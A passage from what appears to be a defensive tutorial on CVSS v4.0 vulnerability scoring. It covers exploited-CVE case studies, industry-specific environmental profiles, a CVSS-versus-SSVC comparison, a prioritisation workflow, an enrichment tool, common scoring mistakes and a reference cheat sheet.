challenge:</strong></p><p>MOVEit Transfer is a <em>managed file transfer service</em>. Organizations that used it often uploaded data from multiple business partners. The Subsequent System impact in v4.0 terms extends not just to internal systems, but to third-party data processed through the platform.</p><pre>For a MOVEit instance processing healthcare data for 50 partner organizations:<br>SC:H (data from all 50 partner orgs is accessible)<br>SI:H (data integrity of all 50 orgs' files at risk)<br>SA:H (disruption affects all 50 orgs' workflows)<br>This is exactly the v4.0 Subsequent System model working as intended.<br>The "blast radius" in SC/SI/SA must reflect the full downstream exposure,<br>not just the immediate server.</pre><h4>Case C: CVE-2024–21762 — FortiOS SSL VPN Out-of-Bounds Write</h4><p><strong>Vulnerability:</strong> Out-of-bounds write in FortiOS and FortiProxy SSL VPN. Enables unauthenticated remote code execution via specially crafted HTTP requests. Exploited by Chinese state-sponsored threat actors (attributed to Volt Typhoon and related clusters) for initial access into US critical infrastructure.</p><pre>Base Vector:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>Base Score: 9.6 Critical<br>CISA KEV: Added February 9, 2024<br>Attribution: Chinese state actors (Volt Typhoon, BRONZE SILHOUETTE)<br>Targets: US telecom, utilities, water systems, defense contractors<br>EPSS: ~0.97+</pre><p><strong>Why environmental adjustments cannot help here:</strong></p><pre>Some organizations attempted to argue:<br>  "Our FortiGate is behind our ISP's firewall" → This is the perimeter device;<br>  it IS the firewall. MAV:A does not apply.<br>"We have IDS monitoring" → FortiOS exploitation bypasses host-based monitoring<br>  because the exploit targets the device providing network access.<br>  "We have incident response capability" → This affects recovery, not exploitability.<br>For any internet-facing SSL VPN endpoint: E:A + AV:N = no score reduction possible.<br>The CVSS-BTE remains at or near 9.6 Critical.</pre><p><strong>Key lesson from these three cases:</strong> Environmental metrics are for reducing false priorities on legitimate non-urgent vulnerabilities. They are not for manufacturing justifications to defer critical work. When CISA KEV + high EPSS + confirmed exploitation by nation-state or ransomware actors = E:A, your response is patching, not scoring.</p><h3>Industry-Specific Scoring: Healthcare, Finance, OT/ICS</h3><p>Different industries have fundamentally different CIA priority models. This affects how Security Requirements (CR/IR/AR) should be set.</p><h4>Healthcare (HIPAA Environment)</h4><p>In healthcare, <strong>Confidentiality</strong> is paramount — HIPAA civil penalties range from ~$137 to ~$68,928 per violation (inflation-adjusted tiers as of 2023), with annual caps per violation category up to $2M+. Patient data exposure is the primary risk.</p><pre>Healthcare Security Requirements Profile:<br>  CR:H — Patient data confidentiality: extremely high (HIPAA, HITECH)<br>  IR:H — Clinical data integrity: critical (wrong data → clinical decisions)<br>  AR:H — System availability: high (clinical workflows depend on uptime)<br>Example: CVE on a hospital's Electronic Health Record (EHR) system:<br>Base: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N<br>Base Score: 5.3 Medium<br>With healthcare profile:<br>  /CR:H/IR:H/AR:H<br>BTE Score: ~7.1 High - urgent patching required<br>Same vulnerability on internal developer workstation:<br>  /CR:L/IR:L/AR:L/MAV:L<br>BTE Score: ~2.8 Low - next maintenance window</pre><p><strong>Healthcare-specific supplemental metrics:</strong></p><ul><li>S:P (Safety: Present) — for vulnerabilities in infusion pumps, ventilators, monitoring systems</li><li>R:I (Recovery: Irrecoverable) — for ransomware affecting PACS/clinical imaging</li></ul><h4>Financial Services (PCI-DSS / SOX Environment)</h4><p>In finance, <strong>Integrity</strong> is often more critical than Confidentiality — financial data manipulation can cause immediate monetary loss, while data disclosure may take weeks to monetize.</p><pre>Financial Services Security Requirements Profile:<br>  CR:H — Customer financial data: high (regulatory, reputational)<br>  IR:H — Transaction integrity: CRITICAL (fraud, unauthorized transfers)<br>  AR:H — Trading/payment systems: critical (SLAs, regulatory requirements)<br>Key distinction from healthcare: IR:H often matters MORE than CR:H here.<br>Example: SQL injection in a payment processing portal:<br>Base: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N<br>Base Score: 8.9 High<br>With PCI environment profile for payment card data scope:<br>  /CR:H/IR:H/AR:H<br>BTE Score: ~9.4 Critical - treat as emergency<br>Same vulnerability on a market-data read-only display terminal:<br>  /CR:L/IR:L/AR:L/MAV:A<br>BTE Score: ~4.1 Medium</pre><h4>OT/ICS (Industrial Control Systems)</h4><p>In OT environments, <strong>Availability and Safety</strong> often supersede Confidentiality. Data breaches are bad; plant shutdowns and physical harm are catastrophic.</p><pre>OT/ICS Security Requirements Profile:<br>  CR:L  — Process data is often not sensitive (flow rates, temperatures)<br>  IR:H  — Control data integrity is critical (wrong setpoint = equipment damage)<br>  AR:H  — Process availability is critical (plant shutdown = immediate loss)<br>  S:P   — Many OT vulnerabilities have physical safety implications<br>Critical distinction: In OT, patching is NOT always possible on short timelines.<br>A patch that requires a production system restart may be more disruptive than<br>the vulnerability itself.<br>CVSS-BTE for OT must account for:<br>  1. The actual network exposure (almost always MAV:A or MAV:L for OT)<br>  2. The patching cost (use Vulnerability Response Effort: RE:H for OT)<br>  3. The safety impact (Safety: S:P when applicable)<br>Example: CVE on a Siemens S7 PLC (SCADA context):<br>Base: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:H/VA:H/SC:H/SI:H/SA:H<br>Base Score: 9.3 Critical<br>OT environmental adjustment:<br>  MAV:A  - PLC on isolated OT VLAN, air-gapped from corporate<br>  MAC:H  - Access requires physical OT network entry (secured facility)<br>  CR:L   - Process data is non-sensitive<br>  IR:H   - Control integrity critical<br>  AR:H   - Process availability critical<br>  /S:P   - Physical safety implications (supplemental, not scored)<br>  /RE:H  - Patching requires production window, vendor support (supplemental)<br>BTE Score: ~7.8 High<br>Action: Schedule for next maintenance window (may be months away)<br>Interim mitigation: Network segmentation controls (document in CVSS-BTE)</pre><h4>Industry Scoring Profile Quick Reference</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tm9OPB1s40rEvjNIP2ARiQ.png"></figure><h3>CVSS vs SSVC: When to Use Which</h3><p><strong>SSVC (Stakeholder-Specific Vulnerability Categorization)</strong> is CISA’s decision-tree framework for vulnerability prioritization. It is an alternative (not replacement) to CVSS that uses a different model.</p><h4>How SSVC Works</h4><p>SSVC asks four questions in sequence, each with structured answers:</p><pre>1. Exploitation Status<br>   → None / POC / Active<br>   (same concept as CVSS E metric, but drives the whole tree)<br>2. Automatable<br>   → Yes / No<br>   (Can the vulnerability be exploited at scale without human interaction?)<br>3. Technical Impact<br>   → Partial / Total<br>   (Does exploitation give total system control or partial?)<br>4. Mission and Well-being Impact<br>   → Minimal / Material / Irreversible<br>   (What is the downstream organizational and human impact?)<br>Outputs (instead of a number): Track / Attend / Act / Immediate</pre><h4>CVSS vs SSVC Comparison</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/581/1*k_QWh3vzpMP0Ezy-dXLQXg.png"></figure><h4>When to Use Each</h4><p><strong>Use CVSS when:</strong></p><ul><li>Regulatory compliance requires it (PCI DSS, HIPAA, NIS2, NIST RMF)</li><li>You need a numeric score for SLA tracking and audit trails</li><li>You are integrating with SIEM, ticketing systems, or scanners that consume CVSS vectors</li><li>You need fine-grained documentation of WHY a vulnerability is de-prioritized</li><li>Supply chain transparency (SBOM, vendor contracts)</li></ul><p><strong>Use SSVC when:</strong></p><ul><li>You need rapid triage without deep metric analysis</li><li>Your team is small and lacks time for full CVSS-BTE enrichment</li><li>You are in a government/defense context where CISA guidance is authoritative</li><li>You want a clear output for non-technical stakeholders (“Act on this now” vs “Track it”)</li></ul><p><strong>Use both when:</strong></p><ul><li>CVSS-BTE for documentation, compliance, and audit</li><li>SSVC for team-level triage and prioritization decisions</li><li>Both frameworks reaching the same conclusion = high confidence</li></ul><p><strong>Example comparison — CVE-2023–4966 (CitrixBleed):</strong></p><pre>CVSS-BTE (internet-facing NetScaler, E:A):<br>  Score: 9.4 Critical<br>  SLA: Patch within 24 hours<br>  Documentation: vector string with E:A, justification for each metric<br>SSVC:<br>  Exploitation: Active<br>  Automatable: Yes (scanning was automated, documented)<br>  Technical Impact: Total (full session token theft)<br>  Mission/Well-being: Irreversible (customer data exposure, regulatory)<br>  → Decision: Immediate<br>Both outputs agree: drop everything, patch now.</pre><h3>The Practical VM Workflow: From Scanner Output to Prioritized Action</h3><h4>The 6-Step Process</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8a38jCuwENp5flLnmWAj7g.png"></figure><pre>┌───────────────────────────────────────────────────────────────┐<br>│             VULNERABILITY MANAGEMENT WORKFLOW (CVSS v4.0)     │<br>│                                                               │<br>│  Step 1: INGEST                                               │<br>│    Scanner Report → extract all CVE IDs + Base Vectors        │<br>│    (Tenable, Qualys, Rapid7, Wiz all export CVE IDs)          │<br>│                                                               │<br>│  Step 2: THREAT ENRICHMENT (automated, applies to all CVEs)   │<br>│    ┌─────────────────────────────────────────────────────┐    │<br>│    │ CISA KEV API → E:A if listed                        │    │<br>│    │ EPSS API → E:P if ≥ 0.1, E:U if &lt; 0.1               │    │<br>│    │ Override: E:A if KEV regardless of EPSS             │    │<br>│    └─────────────────────────────────────────────────────┘    │<br>│                                                               │<br>│  Step 3: ASSET GROUPING                                       │<br>│    Group CVEs by affected system/network zone                 │<br>│    Tag each group: zone, data class, compensating controls    │<br>│                                                               │<br>│  Step 4: ENVIRONMENTAL ENRICHMENT (per asset group)           │<br>│    ┌─────────────────────────────────────────────────────┐    │<br>│    │ Network zone → MAV value (N/A/L/P)                  │    │<br>│    │ Access controls → MAC value (L/H)                   │    │<br>│    │ Data classification → MVC/MVI values                │    │<br>│    │ Blast radius → MSC/MSI/MSA values                   │    │<br>│    │ Asset criticality → CR/IR/AR values                 │    │<br>│    └─────────────────────────────────────────────────────┘    │<br>│                                                               │<br>│  Step 5: RECALCULATE ALL SCORES                               │<br>│    CVSS v4.0 calculator API or FIRST.org calculator           │<br>│    Output: CVSS-BTE score per CVE per asset group             │<br>│                                                               │<br>│  Step 6: PRIORITIZE AND ACT (by CVSS-BTE)                     │<br>│    Critical (9.0+): 24–72 hours — emergency response          │<br>│    High (7.0–8.9):  30 days — planned sprint                  │<br>│    Medium (4.0–6.9): 90 days — next maintenance window        │<br>│    Low (&lt;4.0): Next major release / accept risk               │<br>└───────────────────────────────────────────────────────────────┘</pre><h3>CVSS v4.0 Enrichment Tool</h3><p>The pipeline described throughout this section is available as a standalone command-line tool: <a href="https://github.com/anpa1200/cvss_4.0"><strong>cvss_enrichment_tool</strong></a> (GitHub).</p><pre>git clone https://github.com/anpa1200/cvss_4.0.git <br>cd cvss_4.0<br>pip3 install requests<br>python3 cvss_enrichment_tool.py --cves CVE-2021-44228 CVE-2023-4966 --profile internet_facing</pre><h4>How It Works</h4><p>The tool implements the three-stage enrichment pipeline in a single automated run:</p><pre>CVE IDs → NVD API (Base vector) → CISA KEV (E:A?) → EPSS API (E:P/E:U?)<br>        → Apply asset profile (MAV/MAC/CR/IR/AR/MSC...)<br>        → Output CVSS-BTE vector + severity band + SLA recommendation</pre><p><strong>Stage 1 — Base vector (NVD API 2.0).</strong> For each CVE ID the tool queries services.nvd.nist.gov and retrieves the CVSS vector string. It prefers a v4.0 vector; if only a v3.1 vector exists (common for CVEs predating November 2023), it applies threat-only enrichment and flags the result for manual re-scoring at the FIRST.org calculator.</p><p><strong>Stage 2 — Threat enrichment (KEV + EPSS).</strong> The tool downloads the full CISA KEV catalog in a single request and checks each CVE against it. If listed → E:A. Otherwise it queries the FIRST.org EPSS API: EPSS ≥ 0.5 or ≥ 0.1 → E:P; below 0.1 → E:U.</p><p><strong>Stage 3 — Environmental enrichment (asset profile).</strong> Modified Base metrics and Security Requirements from the selected profile are appended to the vector. The tool ships with six built-in profiles — internet_facing, internal_vlan, isolated_ot, dev_test, healthcare_ehr, pci_payment — covering the most common deployment contexts described in this article.</p><h4>Output</h4><p>The tool prints a severity-ranked table and optionally writes CSV (--output) or JSON (--json) for import into ticket systems or dashboards:</p><pre>CVE                   CVSS   KEV     EPSS  E      Severity    SLA<br>──────────────────────────────────────────────────────────────────<br>CVE-2021-44228         3.1   YES   0.9446  E:A    Critical    24–72 hours<br>CVE-2023-4966          3.1   YES   0.9435  E:A    Critical    24–72 hours<br>CVE-2023-34362         3.1   YES   0.9437  E:A    Critical    24–72 hours<br>CVE-2024-21762         3.1   YES   0.9308  E:A    Critical    24–72 hours<br>CVE-2025-32433         3.1   YES   0.5031  E:A    Critical    24–72 hours</pre><p>Full documentation, profile definitions, and NVD API key instructions are in the repository README: <a href="https://github.com/anpa1200/cvss_4.0"><strong>https://github.com/anpa1200/cvss_4.0</strong></a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CkcYfsDiA-sSCgAXK0SMZg.png"></figure><h3>CVSS as Regulatory Framework: The 5-Phase Maturity Model</h3><p>The CVSS v4.0 lifecycle (CVSS-B → CVSS-BT → CVSS-BTE) maps directly to a regulatory maturity roadmap. This framework was formalized by Rob Arnold (Acorn Pass / CVSS Associates) in the whitepaper “Enhancing National Cyber Resilience: CVSS v4.0 as a Regulatory Framework” (2025).</p><h4>The 5 Phases + SCRM Track</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/571/1*Phjw6InMQW2DgUEy8TSPrg.png"></figure><h4>The Gaming Prevention Problem</h4><p>At Phase 5, CVSS-BTE scores can be lower than CVSS-B. This creates an incentive: organizations might manipulate Environmental metrics to claim compliance while leaving real vulnerabilities unaddressed.</p><p>The regulatory countermeasure:</p><p><strong>Auditors verify environmental claims against evidence:</strong></p><ul><li>MAV:A claimed → auditor validates against firewall rules, network diagrams, penetration test results</li><li>MAC:H claimed → auditor validates against policy documents, VPN logs, MFA enrollment records</li><li>MSC:N claimed → auditor validates against network topology and egress controls</li></ul><p><strong>Auditors verify response to changing E metrics:</strong></p><ul><li>If E:U was set last quarter and the CVE just entered CISA KEV, did the organization detect this change?</li><li>Did they update the E metric from U to A?</li><li>Did they escalate the remediation priority accordingly?</li></ul><p>The principle from the FIRST.org guide: <strong>CVSS-BTE scores are defensible precisely because they are documented and auditable. An organization cannot reduce a score without leaving an evidence trail that auditors can verify.</strong></p><p><strong>Regulatory Applications by Framework:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*VS6SyXxBQgVBvVK7Tgdqzw.png"></figure><h4>Supply Chain CVSS (SCRM Track)</h4><p>Organizations at Phase 5 embed CVSS requirements in supplier contracts:</p><pre>Example supplier contract language:<br>1. The Supplier shall disclose CVSS v4.0 Base vectors for all<br>   vulnerabilities in delivered software within 5 business days<br>   of CVE publication.<br>2. The Supplier shall provide software updates or documented<br>   mitigations sufficient to enable the Buyer to achieve a<br>   CVSS-BTE score of ≤ Medium (6.9) for all High or Critical<br>   Base vulnerabilities.<br>3. The Supplier shall include CVSS v4.0 vectors for all known<br>   vulnerabilities in all Software Bills of Materials (SBOMs).<br>4. The Supplier shall notify the Buyer within 24 hours if any<br>   vulnerability in delivered software enters the CISA KEV catalog.</pre><h3>Supplemental Metrics: The Overlooked Context Layer</h3><p>Supplemental metrics do not change the CVSS score. They add human-readable operational context that the numeric score cannot capture. Think of them as structured analyst notes attached to the vulnerability record.</p><h4>AU:Y — Automatable Exploitation</h4><p>AU:Y means an attacker can script the exploit to run against thousands of targets without human intervention. This is the worm-capability indicator.</p><p><strong>Why it matters beyond the CVSS score:</strong></p><p>Log4Shell (AU:Y) was being exploited by automated scanners within 24 hours of POC release. A CVSS-BTE score of 7.4 High with AU:Y requires faster response than an 8.0 High with AU:N that requires a custom, targeted attack chain.</p><p>Real examples with AU:Y:</p><ul><li>Log4Shell (CVE-2021–44228) — AU:Y: log any HTTP request, mass exploitation immediate</li><li>MOVEit Transfer (CVE-2023–34362) — AU:Y: Cl0p ran fully automated campaign</li><li>HTTP/2 Rapid Reset (CVE-2023–44487) — AU:Y: DDoS amplification automated</li><li>Heartbleed (CVE-2014–0160) — AU:Y: automated scanners ran within hours</li></ul><h4>S:P — Safety Impact in OT/Medical</h4><p>S:P (Safety: Present) flags that exploitation could result in physical harm to people or property. This metric is essential for:</p><ul><li>Industrial control systems (chemical plants, power grids, water treatment)</li><li>Medical devices (infusion pumps, ventilators, pacemakers)</li><li>Automotive systems (ECU vulnerabilities)</li></ul><pre>Example: Vulnerability in a pharmaceutical manufacturing control system<br>CVSS-BTE score: 5.9 Medium (due to MAV:A environmental adjustment)<br>Supplemental: /S:P (Safety: Present)<br><br>Without S:P context, this looks like a 90-day scheduled patch.<br>With S:P context, the medical device safety team must evaluate whether<br>the vulnerability could cause incorrect dosing, batch contamination,<br>or equipment failure - potentially regardless of the numeric CVSS score.</pre><h4>R:I — Irrecoverable Systems</h4><p>R:I (Recovery: Irrecoverable) means successful exploitation causes permanent damage that cannot be remediated without hardware replacement, data restoration from backup, or destructive re-imaging.</p><p><strong>Relevant scenarios:</strong></p><ul><li>Ransomware affecting backup systems (R:I — cannot restore without the backups)</li><li>Firmware corruption on embedded devices (R:I — requires physical device replacement)</li><li>Cryptographic key material theft (R:I — compromised keys cannot be “un-stolen”)</li><li>Industrial control setpoint modification causing equipment damage (R:I — physical damage)</li></ul><h3>The 8 Most Common CVSS Mistakes</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MkFQre3jSuIhOxGQVBdsEQ.png"></figure><h4>Mistake 1: Treating the Base Score as the Final Answer</h4><p>The Base score is produced by a vendor who has never seen your environment. It reflects the worst-case scenario for their entire customer base. For any specific deployment, it is almost always an overestimate. Always enrich with Threat and Environmental metrics before prioritizing remediation.</p><p><strong>What it looks like:</strong> Team sorts scanner output by Base score, assigns SLAs based on Critical/High/Medium bands from raw scanner, spends 90% of effort on low-risk vulnerabilities because their Base scores are high.</p><h4>Mistake 2: Never Setting E:U for CVEs Without Exploit Evidence</h4><p>Leaving E:X (Not Defined) means CVSS assumes every CVE is actively exploited. Given that ~95% of CVEs have no known working exploit, this guarantees your prioritization is inverted. Setting E:U for no-exploit CVEs is not optimism — it is accuracy and it is required for CVSS to function as a tool rather than a scare generator.</p><p><strong>The fix:</strong> Automate KEV + EPSS checks for all new CVEs. Default new CVEs without KEV or EPSS signal to E:U.</p><h4>Mistake 3: Applying the Same Environmental Profile to All Systems</h4><p>An internet-facing web application and an air-gapped industrial controller have entirely different attack vectors, compensating controls, and data sensitivity. Applying identical Environmental metrics to both produces inaccurate scores for both systems. Define asset groups and apply distinct profiles per group.</p><h4>Mistake 4: Not Documenting Environmental Adjustments</h4><p>If you lower a CVE from 9.8 to 4.2 using MAV:A/MAC:H/MSC:N but cannot produce evidence for each adjustment when an auditor asks, those adjustments provide no compliance value. Every Modified metric must cite a specific control, policy, network diagram, or asset classification document.</p><h4>Mistake 5: Confusing CVSS-BTE with Risk Score</h4><p>CVSS-BTE measures severity adjusted for your environment. It is not a risk score. A CVSS-BTE 5.0 Medium vulnerability on a system controlling a nuclear cooling pump may represent existential organizational risk. CVSS informs prioritization within a risk framework — it is not the risk framework itself. Overlay CVSS-BTE with asset criticality, business impact, and regulatory consequence to produce risk decisions.</p><h4>Mistake 6: Static Environmental Metrics</h4><p>Environmental metrics become stale the moment your environment changes. A system that was air-gapped (MAV:A justified) may have had a cloud management connector added three months later. The MAV:A you documented is now wrong, and your 4.5 Medium is actually an 8.9 High.</p><p><strong>The fix:</strong> Tie Environmental metric review to change management. Any change to a system’s network connections, access controls, or data classification should trigger a CVSS-BTE re-evaluation.</p><h4>Mistake 7: Using v3.x Vectors with v4.0 Tools (and Vice Versa)</h4><p>CVSS v4.0 vectors are incompatible with v3.x parsers. The S (Scope) metric from v3.x does not exist in v4.0; the dual-system impact model (VC/VI/VA + SC/SI/SA) does not exist in v3.x. Tools that parse v3.1 vectors will misinterpret v4.0 vectors and produce incorrect scores. Verify scanner, SIEM, and ticketing system compatibility with CVSS v4.0.</p><p><strong>Check your tools:</strong> As of early 2025, Tenable Nessus, Qualys VMDR, and Rapid7 InsightVM all publish CVSS v4.0 scores for new CVEs, but legacy integrations may still expose v3.1 scores by default. Check API output, not just UI display.</p><h4>Mistake 8: Treating CISA KEV as the Only Source of E:A</h4><p>CISA KEV is the best publicly available source for E:A determination, but it has coverage gaps. CISA focuses on US federal agency exposure; some CVEs exploited extensively in other regions or sectors may not appear in KEV. Supplement with:</p><ul><li>Vendor advisories that explicitly state “under active exploitation”</li><li>Commercial threat intelligence feeds (Mandiant, Recorded Future, Greynoise)</li><li>CERT/CC, national CERT advisories (CERT-EU, BSI, ANSSI)</li><li>Industry-specific ISACs (FS-ISAC for finance, H-ISAC for healthcare)</li></ul><h3>Quick Reference Cheatsheet</h3><h4>CVSS v4.0 Base Metrics — Complete Reference</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/511/1*kxsiKTOJOevS1TrQ_rs1gg.png"></figure><pre>ATTACK VECTOR (AV):<br>  N = Network     — Remotely exploitable from internet<br>  A = Adjacent    — Same network segment / LAN required<br>  L = Local       — Local interactive shell access required<br>  P = Physical    — Physical device access required<br>ATTACK COMPLEXITY (AC):<br>  L = Low   - Repeatable without special conditions; script it<br>  H = High  - Requires active bypass of security mechanisms (ASLR, race condition)<br>ATTACK REQUIREMENTS (AT):  [NEW in v4.0 - replaces part of old AC]<br>  N = None    - No special deployment configuration needed<br>  P = Present - Non-default config must be present in deployment<br>PRIVILEGES REQUIRED (PR):<br>  N = None  - Unauthenticated / pre-auth<br>  L = Low   - Regular user account<br>  H = High  - Administrator / root / privileged service account<br>USER INTERACTION (UI):<br>  N = None    - Attacker acts alone, no victim participation<br>  P = Passive - Victim views/receives something (opens page, email preview)<br>  A = Active  - Victim explicitly performs an action (clicks link, runs file)<br>VULNERABLE SYSTEM (VC/VI/VA):  [Replaces C/I/A in v3.x]<br>  N = None    H = High    L = Low<br>SUBSEQUENT SYSTEM (SC/SI/SA):  [Replaces Scope Changed in v3.x]<br>  N = None    H = High    L = Low</pre><h4>Exploit Maturity (E) — Decision Flowchart</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lh8yzf7Ov-0DYt0INQnnxA.png"></figure><pre>Is CVE in CISA KEV?<br>  → YES: E:A (Attacked) ─────────────────────────────────────────┐<br>  → NO: ↓                                                        │<br>                                                                 │<br>Is EPSS ≥ 0.10?                                                  │<br>  → YES (0.1–0.5): Verify ExploitDB/Metasploit/GitHub → E:P      │<br>  → YES (≥ 0.5):  High exploitation probability → E:P minimum    │<br>  → NO:  ↓                                                       │<br>                                                                 │<br>Is there a public exploit? (ExploitDB, Metasploit, GitHub)       │<br>  → YES: E:P (Proof of Concept)                                  │<br>  → NO:  E:U (Unreported)                                        │<br>                                                                 └→ Maximum priority, patch immediately</pre><h4>Environmental Metric Quick Decisions</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*GHhF19IjqW-koABjMuvNRA.png"></figure><pre>"Is this system reachable from the internet?"<br>  YES → No AV change needed       NO → MAV:A (or L/P for more isolated)<br>"Does reaching this system require bypassing MFA/VPN/jump host?"<br>  YES → MAC:H                     NO → No AC change needed<br>"Does this system handle your most sensitive data?"<br>  NO → MVC:L (or N)              YES → No VC change, or set CR:H<br>"Can this system affect other systems if compromised?"<br>  NO → MSC:N/MSI:N/MSA:N        YES → No change, blast radius is real<br>"Is this a test/dev environment?"<br>  YES → CR:L/IR:L/AR:L           NO → Keep vendor defaults or raise CR/IR/AR</pre><h4>Score Impact Reference (Approximate)</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/945/1*r9N4JxU0lxHj7dUqbw9Bog.png"></figure><p><em>Note: CVSS v4.0 uses lookup tables, not formulas — these are empirical approximations.</em></p><h4>Common Vector String Examples</h4><pre># Worst case — all vendor defaults, no enrichment:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>→ 10.0 Critical<br># Internet-facing, actively exploited (CISA KEV):<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:A<br>→ 10.0 Critical (E:A maintains maximum - patch immediately)<br># Internet-facing, POC exists, not yet actively exploited:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P<br>→ ~8.4 High (7-day SLA)<br># Internal (adjacent network), POC exists, MFA VPN required:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/MAV:A/MAC:H<br>→ ~7.4 High (30-day SLA)<br># Internal, isolated (no subsequent system paths), no exploit evidence:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/MAV:A/MAC:H/MSC:N/MSI:N/MSA:N<br>→ ~4.5 Medium (90-day SLA)<br># OT sensor, adjacent network, non-sensitive data, no subsequent paths:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/MAV:A/MAC:H/CR:L/MSC:N/MSI:N/MSA:N<br>→ ~3.9 Low (next maintenance window)</pre><h4>SLA Tiers by CVSS-BTE Score</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BP4ZRBomA9ZjmLotmZ_drw.png"></figure><h3>Tools and Resources</h3><ul><li><a href="https://www.first.org/cvss/calculator/4-0">FIRST.org v4.0 Calculator</a></li><li><a href="https://nvd.nist.gov/vuln-metrics/cvss/v4-calculator">NVD Calculator</a></li><li><a href="https://services.nvd.nist.gov/rest/json/cves/2.0">NVD API — vector retrieval</a></li><li><a href="https://github.com/anpa1200/cvss_4.0">CVSS v4.0 Enrichment Tool — KEV + EPSS + BTE automation</a></li></ul><h4>Specification &amp; Guides</h4><ul><li><a href="https://www.first.org/cvss/v4-0/">CVSS v4.0 Specification</a></li><li><a href="https://www.first.org/cvss/v4.0/implementation-guide">Consumer Implementation Guide</a></li><li><a href="https://www.first.org/cvss/user-guide">CVSS v4.0 User Guide</a></li></ul><h4>Threat Intelligence</h4><ul><li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA KEV Catalog</a></li><li><a href="https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json">CISA KEV API (JSON feed)</a></li><li><a href="https://api.first.org/data/v1/epss?cve=CVE-XXXX-XXXXX">EPSS API</a></li><li><a href="https://www.exploit-db.com/">ExploitDB</a></li></ul><h4>Complementary Frameworks</h4><ul><li><a href="https://www.cisa.gov/sites/default/files/publications/cisa-ssvc-guide.pdf">SSVC Decision Guide (CISA)</a></li><li><a href="https://www.first.org/cvss/v4.0/implementation-guide">CVSS vs SSVC — Implementation Guide §4</a></li></ul><h3>Conclusion</h3><p>CVSS v4.0 answers the question that vulnerability managers have been asking for years: <em>“Why is my scanner showing 500 Critical vulnerabilities when I clearly cannot patch all of them this week?”</em></p><p>The answer is not that CVSS is broken. The answer is that CVSS Base scores were never intended to be your final answer. They are the starting point — a common language between a vendor who does not know your environment and a security team that does.</p><p>The three-layer model (CVSS-B → CVSS-BT → CVSS-BTE) gives your team the tools to translate a generic score into a deployment-specific one. Threat metrics (E + EPSS) eliminate the false urgency from the 95% of CVEs with no known exploit. Environmental metrics eliminate the false priority from scoring isolated systems as if they were internet-facing.</p><p>The real-world examples in this guide — Log4Shell, CitrixBleed, MOVEit, Erlang/OTP, firmware reports — illustrate both directions of this system. Sometimes (Log4Shell, CitrixBleed) the 10.0 score is correct, and environmental arguments are irrelevant: you patch immediately because active exploitation is confirmed and your exposure is real. Sometimes (internal OT sensor, air-gapped development system) a 9.8 Base score correctly becomes a 3.9 Low, not because the vulnerability is less dangerous, but because your deployment makes exploitation genuinely difficult and downstream impact genuinely limited.</p><p><strong>That is not gaming the system. That is using the system correctly.</strong></p><h3>References</h3><ol><li><strong>CVSS v4.0 Specification</strong> — FIRST.org: <a href="https://www.first.org/cvss/v4-0/">https://www.first.org/cvss/v4-0/</a></li><li><strong>CVSS v4.0 Consumer Implementation Guide</strong> — FIRST.org: <a href="https://www.first.org/cvss/v4.0/implementation-guide">https://www.first.org/cvss/v4.0/implementation-guide</a></li><li><strong>CVSS v4.0 User Guide</strong> — FIRST.org: <a href="https://www.first.org/cvss/user-guide">https://www.first.org/cvss/user-guide</a></li><li><strong>EPSS (Exploit Prediction Scoring System)</strong> — FIRST.org: <a href="https://www.first.org/epss/">https://www.first.org/epss/</a></li><li><strong>CISA Known Exploited Vulnerabilities Catalog</strong> — CISA: <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">https://www.cisa.gov/known-exploited-vulnerabilities-catalog</a></li><li><strong>SSVC (Stakeholder-Specific Vulnerability Categorization)</strong> — CISA: <a href="https://www.cisa.gov/ssvc">https://www.cisa.gov/ssvc</a></li><li><strong>NVD (National Vulnerability Database)</strong> — NIST: <a href="https://nvd.nist.gov/">https://nvd.nist.gov</a></li><li><strong>NVD API 2.0 Documentation</strong>: <a href="https://nvd.nist.gov/developers/vulnerabilities">https://nvd.nist.gov/developers/vulnerabilities</a></li><li><strong>CVE-2021–44228 (Log4Shell)</strong> — Apache: <a href="https://logging.apache.org/log4j/2.x/security.html">https://logging.apache.org/log4j/2.x/security.html</a></li><li><strong>CVE-2023–4966 (CitrixBleed)</strong> — Citrix: <a href="https://support.citrix.com/article/CTX579459">https://support.citrix.com/article/CTX579459</a></li><li><strong>CVE-2023–34362 (MOVEit SQLi)</strong> — Progress: <a href="https://www.progress.com/security">https://www.progress.com/security</a></li><li><strong>CVE-2024–21762 (FortiOS)</strong> — Fortinet: <a 